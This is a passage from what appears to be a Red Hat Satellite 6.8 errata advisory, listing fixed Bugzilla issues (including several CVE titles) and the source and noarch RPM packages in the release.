traceback\n1839726 - Bring tfm-rubygem-foreman_leapp to downstream builds\n1839779 - undefined local variable or method `implicit_order_column\u0027 for #\u003cActiveRecord::Associations::CollectionProxy\u003e on GET request to /discovery_rules endpoint\n1839966 - New version of the plugin is available: 2.0.7\n1840166 - ERF42-4995 [Foreman::Exception]: Invalid authenticity token message displayed with traceback, If re-login the machine after session timed-out . \n1840191 - Validate parameters passed by receptor to the receptor-satellite plugin\n1840218 - ArgumentError: wrong number of arguments\n1840525 - Content host list doesn\u0027t update after the successful deletion of content host. \n1840635 - Proxy has failed to load one or more features (Realm)\n1840723 - Selected scenario is DISABLED, can not continue\n1840745 - Satellite installation failed with puppet error \" No Puppet module parser is installed\"\n1841098 - Failed to resolve package dependency while doing satellite upgrade. \n1841143 - Known hosts key removal may fail hard, preventing host from being provisioned\n1841573 - Clicking breadcrumb \"Auth Source Ldaps\" on Create LDAP Auth Source results in \"The page you were looking for doesn\u0027t exist.\"\n1841818 - icons missing on /pub download page\n1842900 - ERROR! the role \u0027satellite-receptor\u0027 was not found in ... \n1842943 - ~foreman-proxy/.ssh is a symlink to /usr/com/foreman-proxy/ssh/\n1843406 - In 6.8, Receptor installation playbook\u0027s inputs are visible again\n1843561 - Report templates duplicated\n1843846 - Host - Registered Content Hosts report: \"Safemode doesn\u0027t allow to access \u0027report_hraders\u0027 on #\u003cSafemode::ScopeObject\u003e\"\n1843867 - Satellite-installer failed with argument error while upgrading the satellite from 6.7 to 6.8\n1843926 - satellite-change-hostname fails when running nsupdate\n1844142 - [RFE] Drop a subsription-manager fact with the satellite version\n1845112 - Installer deploys outdated version of pxegrub2 mac template to TFTP\n1845486 - [RFE] Able to select \u0027HTTP Proxy\u0027 during Compute Resource create for \u0027GCE\u0027 as similar to EC2\n1845860 - hammer org add-provisioning-template command returns Error: undefined method `[]\u0027 for nil:NilClass\n1845978 - CVE-2020-7663 rubygem-websocket-extensions: ReDoS vulnerability in Sec-WebSocket-Extensions parser\n1846254 - need to restart services after enabling leapp plugin\n1846313 - Add index on locks for resource type and task id\n1846317 - undefined method `klass\u0027 for nil:NilClass\n1846421 - build pxe default do not work when more than 1 provider\n1846593 - Satellite-installer failed with error \"Could not find a suitable provider for foreman_smartproxy\" while doing upgrade from 6.7 to 6.8\n1847019 - Empty applicability for non-modular repos\n1847063 - Slow manifest import and/or refresh\n1847407 - load_pools macro not in list of macros\n1847645 - Allow override of Katello\u0027s DISTRIBUTOR_VERSION\n1847784 - Error updating system data on the server, see /var/log/rhsm/rhsm.log for more details. \n1847840 - Libvirt note link leads to 404\n1847871 - Combined Profile Update: ArgumentError: invalid argument: nil. \n1848291 - Download kernel/initram for kexec asynchronously\n1848535 - Unable to create a pure IPv6 host\n1848538 - Failed to resolve the packages due to tfm-runtime package dependency in fm-upgrade(6.7 to 6.8)\n1848902 - ERF42-0258 [Foreman::Exception]: \u003cuuid\u003e is not valid, enter id or name\n1848958 - CVE-2020-14195 jackson-databind: serialization in org.jsecurity.realm.jndi.JndiRealmFactory\n1848962 - CVE-2020-14062 jackson-databind: serialization in com.sun.org.apache.xalan.internal.lib.sql.JNDIConnectionPool\n1848966 - CVE-2020-14061 jackson-databind: serialization in weblogic/oracle-aqjms\n1848973 - capsule-certs-generate suggests running foreman-installer --scenario foreman-proxy-content instead of satellite-installer --scenario capsule\n1849141 - CVE-2020-8184 rubygem-rack: percent-encoded cookies can be used to overwrite existing prefixed cookie names\n1849656 - ERROR! You cannot use loops on \u0027import_tasks\u0027 statements. You should use \u0027include_tasks\u0027 instead. \n1849680 - Task progress decimal precision discrepancy between UI, CLI, and API\n1849869 - Unable to recycle the dynflow executor\n1850355 - Auth Source Role Filters are not working in Satellite 6.8\n1850536 - Can\u0027t add RHEV with APIv3 through Hammer\n1850914 - Checksum type \"sha256\" is not available for all units in the repository. Make sure those units have been downloaded\n1850934 - Satellite-installer failed with error \"Could not evaluate: Proxy xyz..com cannot be retrieved: unknown error (response 502)\"\n1851017 - Position of text cursor in ace-editor wrong and hence unable to edit templates\n1851030 - [RFE] Upgrade Ansible used from RHEL to be 2.9\n1851167 - Autoattach -\u003e \"undefined\" subscription added\n1851176 - Subscriptions do not provide any repository sets\n1851952 - \"candlepin_events FAIL Not running\" and wont restart\n1852371 - Allow http proxy ports by default\n1852723 - Broken link for documentation on installation media page\n1852733 - Inventory upload documentation redirects to default location\n1852735 - New version of the plugin is available: 2.0.8\n1853076 - large capsule syncs cause slow processing of dynflow tasks/steps\n1853200 - foreman-rake-db:migrate Fails on \"No indexes found on foreman_tasks_locks with the options provided\"\n1853280 - Content view filter is excluding modules and Packages when published after upgrading the Satellite from 6.6 to 6.7\n1853463 - Plugin does not upload inventory - Permission denied /var/lib/foreman/red_hat_inventory/uploads/uploader.sh\n1853504 - [Regression] Hammer export-legacy Fails with Composite Content Views\n1853572 - Broken documentation link for \u0027RHV\u0027 in Compute Resource\n1854138 - System purpose status should show as \u0027disabled\u0027 when Satellite is in Simple Content Access mode. \n1854397 - Compliance reports are not being uploaded to satellite. \n1854530 - PG::NotNullViolation when syncing hosts from cloud\n1855008 - Host parameters are set after the host is created. \n1855254 - Links to documentation broken in HTTP Proxies setup\n1855348 - katello_applicability accidentally set to true at install\n1855710 - \u0027Ensure RPM repository is configured and enabled\u0027 task says \u0027FIXME\u0027\n1856370 - Clicking on any other tab other than overview while on capsule synchronizing page, redirects to overview page. \n1856379 - Add missing VM creation tests\n1856401 - [RFE] Add module to create HTTP Proxy\n1856831 - New version of the plugin is available: 2.0.9\n1856837 - undefined method \u0027#httpboot\u0027 for NilClass::Jail (NilClass) when creating an IPv6 only host\n1857124 - Attempting to attach a subscription to an unregistered host results in ISE 500\n1857146 - Unable to build a host bootdisk image due to missing dosfstools package - Failed to format the ESP image via mkfs.msdos\n1857184 - selinux is preventing to build a bootdisk iso - Failed to format the ESP image via mkfs.msdos\n1857377 - Capsule Upgrade Playbook fails with \"Failed to initialize: NoMethodError - undefined method `default_capsule\u0027 for Katello:Module\"\n1857506 - Capsule Upgrade Fail: satellite-installer --scenario capsule --upgrade throws NameError\n1857572 - tailoring-file and scap-content command of hammer downloads file with wrong filename. \n1857726 - Warnings are shown during the satellite package installation on RHEL 7.9\n1858237 - Upgraded Satellite has duplicated katello_pools indexes\n1858284 - CVE-2020-14334 foreman: unauthorized cache read on RPM-based installations through local user\n1858819 - katello-certs-check output print foreman-installer--scenario katello instead satellite-installer --scenario satellite\n1858855 - Creating compute resources on IPV6 network does not fail gracefully\n1859158 - Unknown HTTPBoot EFI hosts are not directed to the grubx64.efi with a default grub conf\n1859194 - load_hosts macro duplicated in a list of macros\n1859276 - Need to update the deprecation warning message on Statistics and Trends page. \n1859705 - Tomcat is not running on fresh Capsule installation\n1859929 - User can perform other manifest actions while the first one starts\n1860351 - \u0027Host - compare content hosts packages\u0027 report fails with error \u0027undefined method \u0027#first\u0027 for NilClass\u0027\n1860407 - remote job-status table should not be re-loaded every second even if a job is running or completed\n1860422 - Host with remediations can\u0027t be removed\n1860430 - \u0027Host - compare content hosts packages\u0027 report: Safemode doesn\u0027t allow to access \u0027version\u0027... \n1860444 - After the system reboot, capsule setup(upgraded or newly installed 6.8 capsule) fails to start the tomcat service\n1860519 - Browsing capsule /pub directory with https fails with forbidden don\u0027t have permission to access /pub/ error. \n1860585 - Content Host Registration page showing version 6.7 for repos instead 6.8\n1860587 - Documentation link in Administer -\u003e About pointing to 6.6 document. \n1860835 - Installed Packages not displayed on About page\n1860957 - Unable to select an organization for sync management\n1861367 - Import Template sync never completes\n1861397 - UI dialog for Capsule Upgrade Playbook job doesn\u0027t state whitelist_options is required\n1861422 - Error encountered while handling the response, replying with an error message (\u0027plugin_config\u0027)\n1861656 - smart-proxy-openscap-send command fails to upload reports to satellite. \n1861724 - ipv6: host form in interfaces are showing Error generating IP: Bad Request\n1861766 - Add ability to list traces by host with hammer\n1861807 - Cancel/Abort button should be disabled once REX job is finish\n1861816 - Error only on production builds: The Dynflow world was not initialized yet. If your plugin uses it, make sure to call Rails.application.dynflow.require! in some initializer\n1861831 - satellite-change-hostname cannot change the satellite hostname after failing. \n1861890 - Recommended repos do not match Satellite version\n1861970 - Content -\u003e Product doesn\u0027t work when no organization is selected\n1862135 - updating hosts policy using bulk action fails with sql error\n1862445 - compliance policy creation fails for ansible deployment option on upgraded satellite. \n1862772 - Default repositories are not enabled, after registering a client with an Activation Key, to an org with Simple Content Access Mode in Red Hat Satellite 6\n1865871 - Obfuscated hosts do not have domain reported\n1865872 - Templates doc - examples on onepage.html are not processed\n1865874 - Add inventory status to host\n1865876 - Make recommendations count in hosts index a link\n1865879 - Add automatic scheduler for insights sync\n1865880 - Add an explanation how to enable insights sync\n1865928 - Templates documentation help page has hard-coded Satellite setting value\n1865943 - dynflow-sidekiq results in messages logs getting filled up more frequently\n1866029 - Templates DSL documentation: Parts of description are put in \u003cpre\u003e tag\n1866436 - host search filter does not work in job invocation page\n1866461 - Run action is missing in job templates page\n1866515 - ForemanVirtWhoConfigure::AuthSourceHiddenWithAuthentication is displayed on auth sources page\n1866700 - Hammer CLI is missing \"resolve\" (traces) option for katello-tracer\n1866710 - Wrong API endpoint path referenced for resolving host traces\n1867239 - hammer content-view version incremental-update fails with ISE\n1867287 - Error Row was updated or deleted by another transaction when deleting docker repository\n1867311 - Upgrade fails when checkpoint_segments postgres parameter configured\n1867399 - Receptor-satellite isn\u0027t able to deal with jobs where all the hosts are unknown to satellite\n1867895 - API Create vmware ComputeResource fails with \"Datacenter can\u0027t be blank\"\n1868183 - Unable to change virt-who hypervisor location. \n1868971 - Receptor installation job doesn\u0027t properly escape data it puts into receptor.conf\n1869640 - client-dispatcher: wrong number of arguments (given 0, expected 1..3) (ArgumentError)\u0027 messages come in upgrade and installation. \n1869812 - Tasks fail to complete under load\n1870657 - Make rake console run as a dynflow client to allow access to features provided by dynflow\n1871016 - managercli.py:1364 - Error: Unable to retrieve service levels: HTTP error (404 - Not Found)\n1871434 - theme css \".container\" class rule is too generic\n1871729 - ansible-runner implementation depends on third party repository for ansible-runner package. \n1871815 - Satellite Ansible Collection - Provisioning a host fails with timeout\n1871978 - Bug in provisioning_template Module\n1872014 - Enable web console on host error in \"Oops, we\u0027re sorry but something went wrong ERF42-5962 [Foreman::Exception]: No template mapped to feature Enable web console\"\n1872041 - Host search returns incorrect result\n1873408 - Updating the CDN URL is manifest works fine but creates some tasks which remains in planned state with success result\n1873926 - CVE-2020-14380 Satellite: Local user impersonation by Single sign-on (SSO) user leads to account takeover\n1874143 - Red Hat Inventory Uploads does not use proxy\n1874160 - Changing Content View of a Content Host needs to better inform the user around client needs\n1874168 - Sync Plan fails with \u0027uninitialized constant Actions::Foreman::Exception\u0027\n1874171 - [RFE] Allow Subscription-manager service plugin for zypper (SLES) to set autorefresh in repo file\n1874172 - [6.7] Unable to re-import subscriptions in large environment (60k+ content hosts)\n1874175 - After upgrading to 6.7 and promoting content, Capsule sync is extremely slow\n1874176 - Unable to search by value of certain Hostgroup parameter\n1874422 - Hits Sync uses only old proxy setting\n1874619 - Hostgroup tag is never reported in slice\n1875357 - After upgrade server response check failed for candlepin. \n1875426 - Azure VM provision fails with error `requests.exceptions.HTTPError: 502 Server Error: Proxy Error for url`\n1875660 - Reporting Template macros host_cores is not working as expected\n1875667 - Audit page list incorrect search filter\n1877307 - [Authentication] External auth login using Kerberos SSO is failing for AD and IDM on Satellite 6.8 only\n1877354 - [Sat6/Bug] RHEL8 systems generate false positive warnings about repo binding\n1877443 - Post Satellite 6.8 Upgrade AD authentication via LDAP fails when using an A record which returns 42 entries\n1877452 - content set mappings for satellite-tools-6.8-for-rhel-8 AUS repos are missing from cdn/cs_mappings-*.csv\n1877520 - content set mappings for satellite-tools-6.8-for-rhel-8 EUS repos are missing from cdn/cs_mappings-*.csv\n1877542 - content set mappings for rhel7 satellite-tools-6.8 EUS repos are missing from cdn/cs_mappings-*.csv\n1878194 - In Capsule upgrade, \"yum update\" dump some error messages. \n1878556 - PXE provisioning in satellite 6.8 requires httpboot enabled\n1878693 - Unable to perform image based deployment using hosts module from Red Hat Satellite Ansible Collections\n1878850 - creating host from hg doesn\u0027t resolves the user-data template\n1879151 - Remote execution status not updating with large number of hosts\n1879448 - Add hits details to host details page\n1879451 - Stop uploading if Satellite\u0027s setting is disconnected\n1879453 - Add plugin version to report metadata\n1879571 - unable to kexec discovered hosts - satellite tries to reach wrong IP\n1880637 - [6.8] satellite-installer always runs upgrade steps\n1881066 - Safemode doesn\u0027t allow to access \u0027host_cores\u0027 on #\u003cSafemode::ScopeObject\u003e\n1881078 - Use Passenger instead of Puma as the Foreman application server\n1881988 - [RFE] IPv6 support for Satellite 6.8\n1882276 - Satellite installation fails at execution of \u0027/usr/sbin/foreman-rake -- config -k \u0027remote_execution_cockpit_url\u0027 -v \u0027/webcon/=%{host}\u0027\u0027\n1882389 - Search query in template for LEAPP upgrade should be pre-filled when running from pre-upgrade results\n1883093 - installer-upgrade failed with error \"Could not evaluate: Proxy XYZ.com cannot be retrieved: unknown error (response 500)\"\n1883472 - [Sat6.8/Bug] when registering more than ~240 in parallel getting this error \"HTTP error (500 - Internal Server Error): Unable to register system, not all services available\"\n1887483 - Access insights pages refer to non-existing stylesheets, resulting in completely broken visuals\n1887489 - Insights rules can\u0027t be loaded on freshly installed Satellite system\n1887808 - Satellite-installer fails because of outdated RHSCL repository on DVD ISO\n\n6. Package List:\n\nRed Hat Satellite Capsule 6.8:\n\nSource:\nansible-collection-redhat-satellite-1.3.0-1.el7sat.src.rpm\nansible-runner-1.4.6-1.el7ar.src.rpm\nansiblerole-foreman_scap_client-0.0.5-1.el7sat.src.rpm\nansiblerole-insights-client-1.7.1-1.el7sat.src.rpm\nansiblerole-satellite-receptor-installer-0.6.13-1.el7sat.src.rpm\ncreaterepo_c-0.7.4-1.el7sat.src.rpm\nforeman-2.1.2.19-1.el7sat.src.rpm\nforeman-bootloaders-redhat-202005201200-1.el7sat.src.rpm\nforeman-discovery-image-3.6.7-1.el7sat.src.rpm\nforeman-discovery-image-service-1.0.0-3.el7sat.src.rpm\nforeman-installer-2.1.2.8-1.el7sat.src.rpm\nforeman-proxy-2.1.2-2.el7sat.src.rpm\nfuture-0.16.0-11.el7sat.src.rpm\ngofer-2.12.5-7.el7sat.src.rpm\nhfsplus-tools-332.14-12.el7.src.rpm\nkatello-3.16.0-1.el7sat.src.rpm\nkatello-certs-tools-2.7.1-1.el7sat.src.rpm\nkatello-client-bootstrap-1.7.5-1.el7sat.src.rpm\nkatello-selinux-3.4.0-1.el7sat.src.rpm\nkobo-0.5.1-1.el7sat.src.rpm\nlibmodulemd-1.7.0-1.pulp.el7sat.src.rpm\nlibsolv-0.7.4-4.pulp.el7sat.src.rpm\nlibwebsockets-2.4.2-2.el7.src.rpm\nlivecd-tools-20.4-1.6.el7sat.src.rpm\nmod_xsendfile-0.12-11.el7sat.src.rpm\nostree-2017.1-2.atomic.el7.src.rpm\npulp-2.21.3-1.el7sat.src.rpm\npulp-docker-3.2.7-1.el7sat.src.rpm\npulp-katello-1.0.3-1.el7sat.src.rpm\npulp-ostree-1.3.1-2.el7sat.src.rpm\npulp-puppet-2.21.3-2.el7sat.src.rpm\npulp-rpm-2.21.3-2.el7sat.src.rpm\npuppet-agent-6.14.0-2.el7sat.src.rpm\npuppet-agent-oauth-0.5.1-3.el7sat.src.rpm\npuppet-foreman_scap_client-0.4.0-1.el7sat.src.rpm\npuppetlabs-stdlib-4.25.1-2.el7sat.src.rpm\npuppetserver-6.13.0-1.el7sat.src.rpm\npycairo-1.16.3-9.el7sat.src.rpm\npygobject3-3.28.3-2.el7sat.src.rpm\npython-amqp-2.2.2-5.el7sat.src.rpm\npython-anyjson-0.3.3-11.el7sat.src.rpm\npython-apypie-0.2.2-1.el7sat.src.rpm\npython-billiard-3.5.0.3-3.el7sat.src.rpm\npython-blinker-1.3-2.el7sat.src.rpm\npython-celery-4.0.2-9.el7sat.src.rpm\npython-click-6.7-9.el7sat.src.rpm\npython-crane-3.3.1-9.el7sat.src.rpm\npython-daemon-2.1.2-7.el7at.src.rpm\npython-django-1.11.29-1.el7sat.src.rpm\npython-flask-0.12.2-4.el7sat.src.rpm\npython-gnupg-0.3.7-1.el7ui.src.rpm\npython-isodate-0.5.4-12.el7sat.src.rpm\npython-itsdangerous-0.24-15.el7sat.src.rpm\npython-jinja2-2.10-10.el7sat.src.rpm\npython-jmespath-0.9.0-6.el7_7.src.rpm\npython-kid-0.9.6-11.el7sat.src.rpm\npython-kombu-4.0.2-13.el7sat.src.rpm\npython-lockfile-0.11.0-10.el7ar.src.rpm\npython-markupsafe-0.23-21.el7sat.src.rpm\npython-mongoengine-0.10.5-2.el7sat.src.rpm\npython-nectar-1.6.2-1.el7sat.src.rpm\npython-oauth2-1.5.211-8.el7sat.src.rpm\npython-okaara-1.0.37-2.el7sat.src.rpm\npython-pexpect-4.6-1.el7at.src.rpm\npython-psutil-5.0.1-3.el7sat.src.rpm\npython-ptyprocess-0.5.2-3.el7at.src.rpm\npython-pycurl-7.43.0.2-4.el7sat.src.rpm\npython-pymongo-3.2-2.el7sat.src.rpm\npython-qpid-1.35.0-5.el7.src.rpm\npython-semantic_version-2.2.0-6.el7sat.src.rpm\npython-simplejson-3.2.0-1.el7sat.src.rpm\npython-twisted-16.4.1-12.el7sat.src.rpm\npython-vine-1.1.3-6.el7sat.src.rpm\npython-werkzeug-0.12.2-5.el7sat.src.rpm\npython-zope-interface-4.0.5-4.el7.src.rpm\nqpid-cpp-1.36.0-28.el7amq.src.rpm\nqpid-dispatch-1.5.0-4.el7.src.rpm\nqpid-proton-0.28.0-3.el7.src.rpm\nredhat-access-insights-puppet-1.0.1-1.el7sat.src.rpm\nrepoview-0.6.6-11.el7sat.src.rpm\nrubygem-fast_gettext-1.1.0-4.el7sat.src.rpm\nrubygem-highline-1.7.8-3.el7sat.src.rpm\nrubygem-newt-0.9.6-3.el7sat.src.rpm\nrubygem-oauth-0.5.4-2.el7sat.src.rpm\nsaslwrapper-0.22-5.el7sat.src.rpm\nsatellite-6.8.0-1.el7sat.src.rpm\nsatellite-installer-6.8.0.11-1.el7sat.src.rpm\ntfm-6.1-1.el7sat.src.rpm\ntfm-rubygem-algebrick-0.7.3-6.el7sat.src.rpm\ntfm-rubygem-ansi-1.5.0-2.el7sat.src.rpm\ntfm-rubygem-apipie-params-0.0.5-5.el7sat.src.rpm\ntfm-rubygem-bundler_ext-0.4.1-4.el7sat.src.rpm\ntfm-rubygem-clamp-1.1.2-5.el7sat.src.rpm\ntfm-rubygem-concurrent-ruby-1.1.6-2.el7sat.src.rpm\ntfm-rubygem-concurrent-ruby-edge-0.6.0-2.el7sat.src.rpm\ntfm-rubygem-domain_name-0.5.20160310-4.el7sat.src.rpm\ntfm-rubygem-dynflow-1.4.7-1.fm2_1.el7sat.src.rpm\ntfm-rubygem-faraday-0.15.4-1.el7sat.src.rpm\ntfm-rubygem-faraday_middleware-0.13.1-2.el7sat.src.rpm\ntfm-rubygem-ffi-1.12.2-1.el7sat.src.rpm\ntfm-rubygem-foreman-tasks-core-0.3.4-1.el7sat.src.rpm\ntfm-rubygem-foreman_ansible_core-3.0.4-1.el7sat.src.rpm\ntfm-rubygem-foreman_remote_execution_core-1.3.0-1.el7sat.src.rpm\ntfm-rubygem-gssapi-1.2.0-6.el7sat.src.rpm\ntfm-rubygem-hashie-3.6.0-1.el7sat.src.rpm\ntfm-rubygem-highline-1.7.8-4.el7sat.src.rpm\ntfm-rubygem-http-cookie-1.0.2-5.el7sat.src.rpm\ntfm-rubygem-infoblox-3.0.0-3.el7sat.src.rpm\ntfm-rubygem-journald-logger-2.0.4-2.el7sat.src.rpm\ntfm-rubygem-journald-native-1.0.11-2.el7sat.src.rpm\ntfm-rubygem-jwt-2.2.1-1.el7sat.src.rpm\ntfm-rubygem-kafo-4.1.0-3.el7sat.src.rpm\ntfm-rubygem-kafo_parsers-1.1.0-3.el7sat.src.rpm\ntfm-rubygem-kafo_wizards-0.0.1-4.el7sat.src.rpm\ntfm-rubygem-little-plugger-1.1.4-1.el7sat.src.rpm\ntfm-rubygem-logging-2.2.2-6.el7sat.src.rpm\ntfm-rubygem-logging-journald-2.0.0-2.el7sat.src.rpm\ntfm-rubygem-mime-types-3.2.2-4.el7sat.src.rpm\ntfm-rubygem-mime-types-data-3.2018.0812-4.el7sat.src.rpm\ntfm-rubygem-multi_json-1.14.1-1.el7sat.src.rpm\ntfm-rubygem-multipart-post-2.0.0-1.el7sat.src.rpm\ntfm-rubygem-mustermann-1.0.2-4.el7sat.src.rpm\ntfm-rubygem-net-ssh-4.2.0-1.el7sat.src.rpm\ntfm-rubygem-net-ssh-krb-0.4.0-3.el7sat.src.rpm\ntfm-rubygem-netrc-0.11.0-3.el7sat.src.rpm\ntfm-rubygem-openscap-0.4.9-3.el7sat.src.rpm\ntfm-rubygem-powerbar-2.0.1-2.el7sat.src.rpm\ntfm-rubygem-rack-2.2.3-1.el7sat.src.rpm\ntfm-rubygem-rack-protection-2.0.3-4.el7sat.src.rpm\ntfm-rubygem-rb-inotify-0.9.7-5.el7sat.src.rpm\ntfm-rubygem-rest-client-2.0.2-3.el7sat.src.rpm\ntfm-rubygem-rkerberos-0.1.5-18.el7sat.src.rpm\ntfm-rubygem-rsec-0.4.3-4.el7sat.src.rpm\ntfm-rubygem-ruby-libvirt-0.7.0-4.el7sat.src.rpm\ntfm-rubygem-rubyipmi-0.10.0-6.el7sat.src.rpm\ntfm-rubygem-sequel-5.7.1-2.el7sat.src.rpm\ntfm-rubygem-sinatra-2.0.3-4.el7sat.src.rpm\ntfm-rubygem-smart_proxy_ansible-3.0.1-5.el7sat.src.rpm\ntfm-rubygem-smart_proxy_dhcp_infoblox-0.0.16-3.el7sat.src.rpm\ntfm-rubygem-smart_proxy_dhcp_remote_isc-0.0.5-2.el7sat.src.rpm\ntfm-rubygem-smart_proxy_discovery-1.0.5-5.el7sat.src.rpm\ntfm-rubygem-smart_proxy_discovery_image-1.2.1-1.fm2_1.el7sat.src.rpm\ntfm-rubygem-smart_proxy_dns_infoblox-1.0.0-7.fm2_1.el7sat.src.rpm\ntfm-rubygem-smart_proxy_dynflow-0.2.4-5.el7sat.src.rpm\ntfm-rubygem-smart_proxy_dynflow_core-0.2.6-1.fm2_1.el7sat.src.rpm\ntfm-rubygem-smart_proxy_openscap-0.7.3-1.fm2_1.el7sat.src.rpm\ntfm-rubygem-smart_proxy_pulp-2.1.0-2.el7sat.src.rpm\ntfm-rubygem-smart_proxy_remote_execution_ssh-0.3.0-3.el7sat.src.rpm\ntfm-rubygem-sqlite3-1.3.13-5.el7sat.src.rpm\ntfm-rubygem-statsd-instrument-2.1.4-2.el7sat.src.rpm\ntfm-rubygem-tilt-2.0.8-4.el7sat.src.rpm\ntfm-rubygem-unf-0.1.3-7.el7sat.src.rpm\ntfm-rubygem-unf_ext-0.0.7.2-1.el7sat.src.rpm\ntfm-rubygem-xmlrpc-0.3.0-2.el7sat.src.rpm\n\nnoarch:\nansible-collection-redhat-satellite-1.3.0-1.el7sat.noarch.rpm\nansible-runner-1.4.6-1.el7ar.noarch.rpm\nansiblerole-foreman_scap_client-0.0.5-1.el7sat.noarch.rpm\nansiblerole-insights-client-1.7.1-1.el7sat.noarch.rpm\nansiblerole-satellite-receptor-installer-0.6.13-1.el7sat.noarch.rpm\ncrane-selinux-3.4.0-1.el7sat.noarch.rpm\nforeman-bootloaders-redhat-202005201200-1.el7sat.noarch.rpm\nforeman-bootloaders-redhat-tftpboot-202005201200-1.el7sat.noarch.rpm\nforeman-debug-2.1.2.19-1.el7sat.noarch.rpm\nforeman-discovery-image-3.6.7-1.el7sat.noarch.rpm\nforeman-installer-2.1.2.8-1.el7sat.noarch.rpm\nforeman-installer-katello-2.1.2.8-1.el7sat.noarch.rpm\nforeman-proxy-2.1.2-2.el7sat.noarch.rpm\nforeman-proxy-content-3.16.0-1.el7sat.noarch.rpm\nforeman-proxy-journald-2.1.2-2.el7sat.noarch.rpm\nkatello-certs-tools-2.7.1-1.el7sat.noarch.rpm\nkatello-client-bootstrap-1.7.5-1.el7sat.noarch.rpm\nkatello-common-3.16.0-1.el7sat.noarch.rpm\nkatello-debug-3.16.0-1.el7sat.noarch.rpm\nkobo-0.5.1-1.el7sat.noarch.rpm\npulp-admin-client-2.21.3-1.el7sat.noarch.rpm\npulp-docker-admin-extensions-3.2.7-1.el7sat.noarch.rpm\npulp-docker-plugins-3.2.7-1.el7sat.noarch.rpm\npulp-katello-1.0.3-1.el7sat.noarch.rpm\npulp-maintenance-2.21.3-1.el7sat.noarch.rpm\npulp-nodes-child-2.21.3-1.el7sat.noarch.rpm\npulp-nodes-common-2.21.3-1.el7sat.noarch.rpm\npulp-nodes-parent-2.21.3-1.el7sat.noarch.rpm\npulp-ostree-admin-extensions-1.3.1-2.el7sat.noarch.rpm\npulp-ostree-plugins-1.3.1-2.el7sat.noarch.rpm\npulp-puppet-admin-extensions-2.21.3-2.el7sat.noarch.rpm\npulp-puppet-plugins-2.21.3-2.el7sat.noarch.rpm\npulp-rpm-admin-extensions-2.21.3-2.el7sat.noarch.rpm\npulp-rpm-plugins-2.21.3-2.el7sat.noarch.rpm\npulp-selinux-2.21.3-1.el7sat.noarch.rpm\npulp-server-2.21.3-1.el7sat.noarch.rpm\npuppet-agent-oauth-0.5.1-3.el7sat.noarch.rpm\npuppet-foreman_scap_client-0.4.0-1.el7sat.noarch.rpm\npuppetlabs-stdlib-4.25.1-2.el7sat.noarch.rpm\npuppetserver-6.13.0-1.el7sat.noarch.rpm\npython-blinker-1.3-2.el7sat.noarch.rpm\npython-gnupg-0.3.7-1.el7ui.noarch.rpm\npython-gofer-2.12.5-7.el7sat.noarch.rpm\npython-gofer-qpid-2.12.5-7.el7sat.noarch.rpm\npython-kid-0.9.6-11.el7sat.noarch.rpm\npython-mongoengine-0.10.5-2.el7sat.noarch.rpm\npython-nectar-1.6.2-1.el7sat.noarch.rpm\npython-oauth2-1.5.211-8.el7sat.noarch.rpm\npython-pulp-agent-lib-2.21.3-1.el7sat.noarch.rpm\npython-pulp-bindings-2.21.3-1.el7sat.noarch.rpm\npython-pulp-client-lib-2.21.3-1.el7sat.noarch.rpm\npython-pulp-common-2.21.3-1.el7sat.noarch.rpm\npython-pulp-docker-common-3.2.7-1.el7sat.noarch.rpm\npython-pulp-integrity-2.21.3-2.el7sat.noarch.rpm\npython-pulp-oid_validation-2.21.3-1.el7sat.noarch.rpm\npython-pulp-ostree-common-1.3.1-2.el7sat.noarch.rpm\npython-pulp-puppet-common-2.21.3-2.el7sat.noarch.rpm\npython-pulp-repoauth-2.21.3-1.el7sat.noarch.rpm\npython-pulp-rpm-common-2.21.3-2.el7sat.noarch.rpm\npython-pulp-streamer-2.21.3-1.el7sat.noarch.rpm\npython-qpid-1.35.0-5.el7.noarch.rpm\npython-semantic_version-2.2.0-6.el7sat.noarch.rpm\npython2-amqp-2.2.2-5.el7sat.noarch.rpm\npython2-ansible-runner-1.4.6-1.el7ar.noarch.rpm\npython2-anyjson-0.3.3-11.el7sat.noarch.rpm\npython2-apypie-0.2.2-1.el7sat.noarch.rpm\npython2-celery-4.0.2-9.el7sat.noarch.rpm\npython2-click-6.7-9.el7sat.noarch.rpm\npython2-crane-3.3.1-9.el7sat.noarch.rpm\npython2-daemon-2.1.2-7.el7at.noarch.rpm\npython2-django-1.11.29-1.el7sat.noarch.rpm\npython2-flask-0.12.2-4.el7sat.noarch.rpm\npython2-future-0.16.0-11.el7sat.noarch.rpm\npython2-isodate-0.5.4-12.el7sat.noarch.rpm\npython2-itsdangerous-0.24-15.el7sat.noarch.rpm\npython2-jinja2-2.10-10.el7sat.noarch.rpm\npython2-jmespath-0.9.0-6.el7_7.noarch.rpm\npython2-kombu-4.0.2-13.el7sat.noarch.rpm\npython2-lockfile-0.11.0-10.el7ar.noarch.rpm\npython2-okaara-1.0.37-2.el7sat.noarch.rpm\npython2-pexpect-4.6-1.el7at.noarch.rpm\npython2-ptyprocess-0.5.2-3.el7at.noarch.rpm\npython2-vine-1.1.3-6.el7sat.noarch.rpm\npython2-werkzeug-0.12.2-5.el7sat.noarch.rpm\nqpid-dispatch-tools-1.5.0-4.el7.noarch.rpm\nqpid-tools-1.36.0-28.el7amq.noarch.rpm\nredhat-access-insights-puppet-1.0.1-1.el7sat.noarch.rpm\nrepoview-0.6.6-11.el7sat.noarch.rpm\nrubygem-fast_gettext-1.1.0-4.el7sat.noarch.rpm\nrubygem-highline-1.7.8-3.el7sat.noarch.rpm\nrubygem-oauth-0.5.4-2.el7sat.noarch.rpm\nsatellite-capsule-6.8.0-1.el7sat.noarch.rpm\nsatellite-common-6.8.0-1.el7sat.noarch.rpm\nsatellite-debug-tools-6.8.0-1.el7sat.noarch.rpm\nsatellite-installer-6.8.0.11-1.el7sat.noarch.rpm\ntfm-rubygem-algebrick-0.7.3-6.el7sat.noarch.rpm\ntfm-rubygem-ansi-1.5.0-2.el7sat.noarch.rpm\ntfm-rubygem-apipie-params-0.0.5-5.el7sat.noarch.rpm\ntfm-rubygem-bundler_ext-0.4.1-4.el7sat.noarch.rpm\ntfm-rubygem-clamp-1.1.2-5.el7sat.noarch.rpm\ntfm-rubygem-concurrent-ruby-1.1.6-2.el7sat.noarch.rpm\ntfm-rubygem-concurrent-ruby-edge-0.6.0-2.el7sat.noarch.rpm\ntfm-rubygem-domain_name-0.5.20160310-4.el7sat.noarch.rpm\ntfm-rubygem-dynflow-1.4.7-1.fm2_1.el7sat.noarch.rpm\ntfm-rubygem-faraday-0.15.4-1.el7sat.noarch.rpm\ntfm-rubygem-faraday_middleware-0.13.1-2.el7sat.noarch.rpm\nt